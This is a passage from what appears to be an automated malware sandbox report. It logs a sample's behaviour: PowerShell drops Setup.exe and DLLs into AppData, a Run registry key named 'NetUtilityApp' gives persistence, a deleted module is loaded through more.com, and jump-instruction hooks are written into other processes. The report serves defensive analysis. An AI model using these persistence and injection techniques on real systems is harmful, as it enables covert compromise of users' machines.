              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_3_0340F039 push edi; retn 0045h11_3_0340F03C
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_3_0340F039 push edi; retn 0045h11_3_0340F03C
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_3_0340F033 push edi; retn 0045h11_3_0340F03C
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_3_03422C86 push eax; retf 11_3_03422C88
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_3_0340F033 push edi; retn 0045h11_3_0340F03C
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_077E31DE push FFFFFFE8h; retf 14_2_077E31E1
              Source: msvcr90.dll.0.drStatic PE information: section name: .text entropy: 6.9217598022130655
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeJump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\FeGIPCnK\msvcr90.dllJump to dropped file
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeFile created: C:\Users\user\AppData\Roaming\Driver\python27.dllJump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\FeGIPCnK\Resource.ctJump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\FeGIPCnK\UpdateClient.dllJump to dropped file
              Source: C:\Windows\SysWOW64\more.comFile created: C:\Users\user\AppData\Local\Temp\eqoamnqfgJump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\FeGIPCnK\python27.dllJump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\FeGIPCnK\config.prxJump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\FeGIPCnK\UpdateCommon.dllJump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\FeGIPCnK\Data\d3dcompiler_47.dllJump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\FeGIPCnK\NAudio.dllJump to dropped file
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeFile created: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exeJump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\FeGIPCnK\Data\Updater.exJump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\FeGIPCnK\RcClientBase.dllJump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\FeGIPCnK\Data\ffmpeg.dllJump to dropped file
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeFile created: C:\Users\user\AppData\Roaming\Driver\msvcr90.dllJump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\FeGIPCnK\Resource.ctJump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\FeGIPCnK\Data\Updater.exJump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\FeGIPCnK\config.prxJump to dropped file
              Source: C:\Windows\SysWOW64\more.comFile created: C:\Users\user\AppData\Local\Temp\eqoamnqfgJump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NetUtilityAppJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NetUtilityAppJump to behavior

              Hooking and other Techniques for Hiding and Protection

              barindex
              Found hidden mapped module (file has been removed from disk)
              Source: C:\Windows\SysWOW64\more.comModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\EQOAMNQFG
              Loading BitLocker PowerShell Module
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Overwrites code with unconditional jumps - possibly settings hooks in foreign process
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeMemory written: PID: 6476 base: 5A0005 value: E9 8B 2F 96 76 Jump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeMemory written: PID: 6476 base: 76F02F90 value: E9 7A D0 69 89 Jump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeMemory written: PID: 6476 base: 750005 value: E9 2B BA 77 76 Jump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeMemory written: PID: 6476 base: 76ECBA30 value: E9 DA 45 88 89 Jump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeMemory written: PID: 6476 base: 770008 value: E9 8B 8E 7A 76 Jump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeMemory written: PID: 6476 base: 76F18E90 value: E9 80 71 85 89 Jump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeMemory written: PID: 6476 base: 1FA0005 value: E9 8B 4D C5 73 Jump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeMemory written: PID: 6476 base: 75BF4D90 value: E9 7A B2 3A 8C Jump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeMemory written: PID: 6476 base: 1FB0005 value: E9 EB EB C5 73 Jump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeMemory written: PID: 6476 base: 75C0EBF0 value: E9 1A 14 3A 8C Jump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeMemory written: PID: 6476 base: 1FD0005 value: E9 8B 8A 00 73 Jump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeMemory written: PID: 6476 base: 74FD8A90 value: E9 7A 75 FF 8C Jump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeMemory written: PID: 6476 base: 1FE0005 value: E9 2B 02 02 73 Jump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeMemory written: PID: 6476 base: 75000230 value: E9 DA FD FD 8C Jump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeMemory written: PID: 1020 base: 5B0005 value: E9 8B 2F 95 76 Jump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeMemory written: PID: 1020 base: 76F02F90 value: E9 7A D0 6A 89 Jump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeMemory written: PID: 1020 base: 5C0005 value: E9 2B BA 90 76 Jump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeMemory written: PID: 1020 base: 76ECBA30 value: E9 DA 45 6F 89 Jump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeMemory written: PID: 1020 base: 5D0008 value: E9 8B 8E 94 76 Jump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeMemory written: PID: 1020 base: 76F18E90 value: E9 80 71 6B 89 Jump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeMemory written: PID: 1020 base: 5F0005 value: E9 8B 4D 60 75 Jump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeMemory written: PID: 1020 base: 75BF4D90 value: E9 7A B2 9F 8A Jump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeMemory written: PID: 1020 base: 600005 value: E9 EB EB 60 75 Jump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeMemory written: PID: 1020 base: 75C0EBF0 value: E9 1A 14 9F 8A Jump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeMemory written: PID: 1020 base: 620005 value: E9 8B 8A 9B 74 Jump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeMemory written: PID: 1020 base: 74FD8A90 value: E9 7A 75 64 8B Jump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeMemory written: PID: 1020 base: 630005 value: E9 2B 02 9D 74 Jump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeMemory written: PID: 1020 base: 75000230 value: E9 DA FD 62 8B Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
